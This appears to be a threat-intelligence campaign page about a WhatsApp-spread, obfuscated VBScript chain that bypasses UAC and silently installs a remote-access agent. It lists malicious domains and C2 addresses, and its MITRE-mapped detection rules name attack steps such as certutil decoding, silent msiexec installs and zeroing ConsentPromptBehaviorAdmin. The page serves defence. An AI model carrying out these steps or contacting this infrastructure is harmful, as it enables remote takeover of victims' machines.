Campaigns
WhatsApp VBScript RMM Campaign

WhatsApp VBScript RMM Campaign

WhatsAppVBScriptRMM AbuseUAC BypassSocial Engineering
An unattributed, access-motivated actor is abusing compromised WhatsApp accounts to send the contacts of those accounts heavily obfuscated VBScript files disguised as business and financial documents. When opened, the VBScript runs a multi-stage chain that tampers with Windows User Account Control and silently installs a preconfigured ManageEngine Endpoint Central (RMM) agent, granting the attacker remote access to the victim's machine.

Indicators of Compromise

invoice.msopsa.top
facaia.s3.us-east-005.backblazeb2.com
yifubafu.s3.ap-southeast-1.amazonaws.com
hksha3.s3.ap-southeast-1.amazonaws.com
qse.shoppes.help
caiwuascw.s3.us-east-005.backblazeb2.com
sjdkjj23.s3.ap-southeast-1.amazonaws.com
xijkwm2.s3.ap-southeast-1.amazonaws.com
baoyuw2s.s3.ap-southeast-1.amazonaws.com
shaaslong.one
baolongwes.oss-ap-southeast-1.aliyuncs.com
temu.baskwms.top
baoxis.cc

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

Remediation / Detections

Source: attack.mitre.org

Technique ID

Technique Name

Detection ID

Detection Name

Recommended Detection Action

T1566.003

Phishing: Spearphishing via Service

DET0115

Detection Strategy for Spearphishing via a Service

Monitor messaging platform API logs and endpoint telemetry for VBScript files delivered via WhatsApp Desktop or WhatsApp Web processes.

T1204.002

User Execution: Malicious File

DET0294

User Execution – Malicious File

Alert on WScript.exe or CScript.exe spawned by WhatsApp.Root.exe, explorer.exe, or browsers opening files from the Downloads directory.

T1059.005

Command and Scripting Interpreter: Visual Basic

DET0076

Behavioral Detection of Visual Basic Execution

Detect WScript.exe executing .vbs/.vbe files from C:\Users\Public\Documents\ or user temp directories; flag multi-stage download chains.

T1059.001

Command and Scripting Interpreter: PowerShell

DET0455

Abuse of PowerShell for Arbitrary Execution

Alert on PowerShell invoked by VBScript (WScript.exe → powershell.exe) performing file download operations.

T1105

Ingress Tool Transfer

DET0060

Detect Ingress Tool Transfers via Behavioral Chain

Monitor for curl.exe, bitsadmin.exe, or certutil.exe spawned by scripting engines downloading content from cloud storage buckets (S3, Alibaba OSS, Backblaze).

T1140

Deobfuscate/Decode Files or Information

DET0275

Detect Adversary Deobfuscation or Decoding

Detect certutil -decode or PowerShell Base64 decode operations performed by WScript child processes.

T1027

Obfuscated Files or Information

DET0378

Behavioral Detection of Obfuscated Files or Information

Flag VBScript files with excessive string concatenation, randomized variable names, or entropy anomalies indicative of heavy obfuscation.

T1036.008

Masquerading: Masquerade File Type

DET0226

Detection Strategy for Masquerading via File Type Modification

Alert on file rename operations that change extensions from .pdf or .txt to .vbs performed by scripting engine child processes.

T1197

BITS Jobs

DET0098

Detect abuse of Windows BITS Jobs

Monitor BitsTransfer or bitsadmin.exe download jobs created by WScript.exe; alert on BITS jobs targeting non-corporate cloud storage domains.

T1553.005

Subvert Trust Controls: Mark-of-the-Web Bypass

DET0257

Detect Mark-of-the-Web (MOTW) Bypass

Monitor for deletion of Zone.Identifier alternate data streams from files extracted by Shell.Application CopyHere method.

T1548.002

Abuse Elevation Control Mechanism: Bypass UAC

DET0388

Detection Strategy for Bypass User Account Control (UAC)

Alert on repeated registry modification attempts targeting HKLM\...\Policies\System\ConsentPromptBehaviorAdmin via runas-elevated ShellExecute calls.

T1112

Modify Registry

DET0280

Behavior-Based Registry Modification Detection on Windows

Monitor registry writes to ConsentPromptBehaviorAdmin; alert on any change to a value of 0 (no prompt) by non-administrative processes.

T1564.001

Hide Artifacts: Hidden Files and Directories

DET0032

Detection Strategy for Hidden Files and Directories

Detect creation of directories under C:\Users\Public\Documents\ with hidden and system attributes set by scripting engine processes.

T1218.007

System Binary Proxy Execution: Msiexec

DET0158

Detection of Msiexec Abuse

Alert on msiexec.exe invoked silently (/qn) by WScript.exe or cmd.exe to install UEMSAgent.msi or other non-IT-approved MSI packages.

T1102

Web Service

DET0425

Suspicious Use of Web Services for C2

Detect outbound HTTP/HTTPS connections from WScript child processes to S3, Alibaba OSS (aliyuncs.com), or Backblaze B2 endpoints.

T1219

Remote Access Tools

DET0496

Behavior-Chain Detection for Remote Access Tools

Monitor for ManageEngine Endpoint Central agent registration beaconing to the 202.61.160.0/24 subnet or 38.55.151.63 not initiated by IT.

Observed Countries11

AU (799)
BR (975)
ES (801)
GB (873)
IN (772)
MX (331)
MY (572)
RU (757)
SG (376)
TW (560)
VN (871)